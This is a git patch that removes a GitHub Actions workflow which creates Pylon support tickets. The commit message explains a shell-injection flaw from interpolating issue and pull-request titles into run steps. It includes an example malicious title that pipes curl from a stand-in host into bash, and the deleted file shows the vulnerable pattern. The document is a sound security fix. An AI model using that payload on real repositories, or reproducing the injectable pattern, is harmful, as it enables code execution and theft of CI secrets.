From 3e1895357fefe860be51c4f56acd8621c51e9036 Mon Sep 17 00:00:00 2001
From: Itamar Hartstein <haritamar@gmail.com>
Date: Sat, 25 Apr 2026 14:18:27 +0300
Subject: [PATCH] security: remove vulnerable create_pylon_issue.yml workflow

This workflow interpolates `${{ github.event.issue.title }}` and
`${{ github.event.pull_request.title }}` directly into `run:` shell
steps. The surrounding single quotes around the curl `--data` payload
do not protect against a quote-breakout in the title (e.g.
`foo'$(curl evil|bash)'bar`), giving any GitHub user code execution
on the runner with the workflow's GITHUB_TOKEN, PYLON_API_KEY,
PYLON_ACCOUNT_ID, and PYLON_REQUESTER_ID.

The trigger surface is broad: `issues: opened` lets any user trigger
it by opening an issue, and `pull_request_target: opened` runs in the
base-repo context with access to base secrets against fork-controlled
input.

Removing entirely for now; the auto-create-Pylon-ticket behavior can
be reintroduced later with env-var indirection for user-controlled
fields and an author_association gate.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 .github/workflows/create_pylon_issue.yml | 72 ------------------------
 1 file changed, 72 deletions(-)
 delete mode 100644 .github/workflows/create_pylon_issue.yml

diff --git a/.github/workflows/create_pylon_issue.yml b/.github/workflows/create_pylon_issue.yml
deleted file mode 100644
index a43dafd7d..000000000
--- a/.github/workflows/create_pylon_issue.yml
+++ /dev/null
@@ -1,72 +0,0 @@
-name: Create Pylon Issue
-
-on:
-  issues:
-    types: [opened]
-  pull_request_target:
-    types: [opened]
-
-jobs:
-  create_pylon_issue:
-    runs-on: ubuntu-latest
-    steps:
-      - name: Install jq
-        run: sudo apt-get install -y jq
-
-      - name: Create Pylon Issue for GitHub Issue
-        if: github.event_name == 'issues'
-        run: |
-          response=$(curl --request POST \
-            --url https://api.usepylon.com/issues \
-            --header 'Authorization: ${{ secrets.PYLON_API_KEY }}' \
-            --header 'Content-Type: application/json' \
-            --data '{
-            "account_id": "${{ secrets.PYLON_ACCOUNT_ID }}",
-            "requester_id": "${{ secrets.PYLON_REQUESTER_ID }}",
-            "priority": "medium",
-            "title": "${{ github.event.issue.title }}",
-            "body_html": "<html lang=en><head><title>GitHub Issue Details</title></head><body><h1>GitHub Issue Details</h1><p><strong>Repository:</strong> ${{ github.repository }}</p><p><strong>Type:</strong> Github Issue</p><p><strong>URL:</strong> <a href=${{ github.event.issue.html_url }}>${{ github.event.issue.html_url }}</a></p></body></html>"
-          }')
-          ticket_id=$(echo $response | jq -r '.data.id')
-          echo "ticket_id=$ticket_id" >> $GITHUB_ENV
-
-      - name: Add Pylon ticket ID to issue body
-        if: success()
-        run: |
-          issue_body=$(curl -s -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \
-            "https://api.github.com/repos/${{ github.repository }}/issues/${{ github.event.issue.number }}" | jq -r '.body')
-          new_body="$issue_body<!-- pylon-ticket-id: ${{ env.ticket_id }} -->"
-          json_body=$(jq -R -s --arg body "$new_body" '{"body": $body}' <<< "$new_body")
-          curl -X PATCH -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \
-            -H "Content-Type: application/json" \
-            -d "$json_body" \
-            "https://api.github.com/repos/${{ github.repository }}/issues/${{ github.event.issue.number }}"
-
-      - name: Create Pylon Issue for Pull Request
-        if: contains(github.event_name, 'pull_request')
-        run: |
-          response=$(curl --request POST \
-            --url https://api.usepylon.com/issues \
-            --header 'Authorization: ${{ secrets.PYLON_API_KEY }}' \
-            --header 'Content-Type: application/json' \
-            --data '{
-            "account_id": "${{ secrets.PYLON_ACCOUNT_ID }}",
-            "requester_id": "${{ secrets.PYLON_REQUESTER_ID }}",
-            "priority": "high",
-            "title": "${{ github.event.pull_request.title }}",
-            "body_html": "<html lang=en><head><title>GitHub Pull Request Details</title></head><body><h1>GitHub Pull Request Details</h1><p><strong>Repository:</strong> ${{ github.repository }}</p><p><strong>Type:</strong> Pull Request</p><p><strong>URL:</strong> <a href=${{ github.event.pull_request.html_url }}>${{ github.event.pull_request.html_url }}</a></p></body></html>"
-          }')
-          ticket_id=$(echo $response | jq -r '.data.id')
-          echo "ticket_id=$ticket_id" >> $GITHUB_ENV
-
-      - name: Add Pylon ticket ID to PR body
-        if: success()
-        run: |
-          pr_body=$(curl -s -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \
-                     "https://api.github.com/repos/${{ github.repository }}/pulls/${{ github.event.pull_request.number }}" | jq -r '.body')
-          new_body="$pr_body<!-- pylon-ticket-id: ${{ env.ticket_id }} -->"
-          json_body=$(jq -R -s --arg body "$new_body" '{"body": $body}' <<< "$new_body")
-          curl -X PATCH -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \
-            -H "Content-Type: application/json" \
-            -d "$json_body" \
-            "https://api.github.com/repos/${{ github.repository }}/pulls/${{ github.event.pull_request.number }}"